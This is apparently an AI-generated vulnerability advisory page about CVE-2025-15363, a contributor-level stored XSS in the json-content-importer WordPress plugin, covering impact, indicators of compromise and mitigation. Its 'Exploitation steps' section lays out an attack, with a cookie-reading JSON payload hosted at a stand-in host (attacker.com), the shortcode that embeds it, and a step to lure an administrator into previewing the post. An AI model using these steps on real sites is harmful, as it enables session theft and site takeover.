CVE-2025-15363: 
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-15363 is a Contributor+ Stored Cross-Site Scripting (XSS) vulnerability in the Get Use APIs (json-content-importer) WordPress plugin affecting versions before 2.0.10. The plugin improperly executes imported JSON content, allowing authenticated users with at least Contributor-level access to inject and store malicious scripts under certain server configurations (specifically when PHP's mbstring extension is not installed). It was publicly disclosed on February 25, 2026, and carries a CVSS v3.1 base score of 5.9 (Medium) (WPScan, Red Hat CVE).

Technical details

The root cause is improper neutralization of input during web page generation (CWE-79). The plugin's [jsoncontentimporter] shortcode fetches and renders JSON from a user-supplied URL without adequately sanitizing or escaping the returned content before outputting it to the page. When PHP's mbstring extension is absent, the plugin's encoding-related safeguards fail, allowing raw JavaScript from the imported JSON to be executed in the browser. An attacker with Contributor access can craft a post containing the shortcode pointing to a malicious JSON file hosted at an attacker-controlled URL; when a privileged user (e.g., an admin) previews or views the post, the stored XSS payload executes in their browser context (WPScan).

Impact

Successful exploitation allows a low-privileged authenticated attacker (Contributor role) to execute arbitrary JavaScript in the browser of higher-privileged users such as administrators who preview or view the crafted post. This can lead to session cookie theft, credential harvesting, unauthorized administrative actions (e.g., creating rogue admin accounts, installing malicious plugins), and potential full site compromise. The scope change (S:C in CVSS) reflects that the impact crosses from the contributor's session into the victim's browser context (WPScan, Red Hat CVE).

Exploitability

A proof-of-concept (PoC) is publicly available via WPScan, detailing the exact shortcode and malicious JSON payload required for exploitation. Exploitation requires an authenticated Contributor-level account and the target server must lack the PHP mbstring extension, which limits the attack surface. The EPSS score is approximately 0.029% (0.000290), indicating low predicted exploitation probability in the near term. No in-the-wild exploitation, threat actor attribution, or CISA KEV catalog listing has been reported as of the time of disclosure (WPScan, Red Hat CVE).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the Get Use APIs (json-content-importer) plugin at a version below 2.0.10, and confirm the server lacks the PHP mbstring extension (which disables the plugin's encoding safeguards).
  2. Obtain Contributor access: Register or use an existing Contributor-level account on the target WordPress site.
  3. Host malicious JSON: Create and host a publicly accessible JSON file at an attacker-controlled URL (e.g., https://attacker.com/xss.json) with a payload such as:
{
  "articles": [
    {
      "title": "alert('XSS Attack! Cookie: ' + document.cookie)",
      "author": "Attacker",
      "content": "This is a test"
    }
  ]
}
  1. Create malicious post: As Contributor, create a WordPress post (draft) containing the shortcode:
[jsoncontentimporter url="https://attacker.com/xss.json" basenode="articles"]
{title} By: {author} {content}
[/jsoncontentimporter]
  1. Trigger execution: Wait for or socially engineer an administrator to preview the drafted post. The plugin fetches and renders the JSON without sanitization, executing the JavaScript payload in the admin's browser.
  2. Achieve objective: The XSS payload can exfiltrate session cookies, perform actions as the admin (e.g., create a new admin account), or install a backdoor plugin (WPScan).

Indicators of compromise

  • Logs: WordPress access logs showing POST requests to wp-admin/post.php or wp-admin/post-new.php from Contributor accounts containing jsoncontentimporter shortcode with external URLs in the post body; HTTP GET requests from the WordPress server to external/unknown JSON-hosting URLs at post preview time.
  • File System: No direct file artifacts expected, but review post content in the WordPress database (wp_posts table) for shortcodes referencing external URLs with jsoncontentimporter.
  • Network: Outbound HTTP/HTTPS requests from the WordPress server to attacker-controlled domains serving .json files, particularly triggered during admin post preview actions.
  • Application: Unexpected JavaScript alerts, redirects, or new administrator accounts created without authorization; review WordPress audit logs for new admin user creation or plugin installations following post preview events (WPScan).

Mitigation and workarounds

Update the Get Use APIs (json-content-importer) WordPress plugin to version 2.0.10 or later, which addresses the improper JSON execution behavior. As a temporary workaround, ensure the PHP mbstring extension is installed on the server, as its presence prevents the vulnerable code path from being triggered. Additionally, restrict Contributor-level user registrations and review existing Contributor accounts for suspicious post drafts containing jsoncontentimporter shortcodes pointing to external URLs (WPScan).

Community reactions

The vulnerability was discovered and responsibly disclosed by security researcher Ahmed Makawi, who submitted it to WPScan. The disclosure was picked up by standard vulnerability aggregators and CVE tracking services shortly after publication. No significant vendor statements beyond the patch release or notable community debate has been observed (WPScan).

Additional resources


Source: This report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-86850MEDIUM6.5
  • sku-error-fixer-for-woocommerce
NoNoOct 06, 2026
CVE-2026-88931MEDIUM5.3
  • social-web-suite
NoNoOct 06, 2026
CVE-2026-87841MEDIUM5.3
  • unitechpay-paiements-mobile-money
NoNoOct 06, 2026
CVE-2026-92990MEDIUM5.3
  • sendpress
NoNoOct 06, 2026
CVE-2026-92989MEDIUM4.3
  • sendpress
NoNoOct 06, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management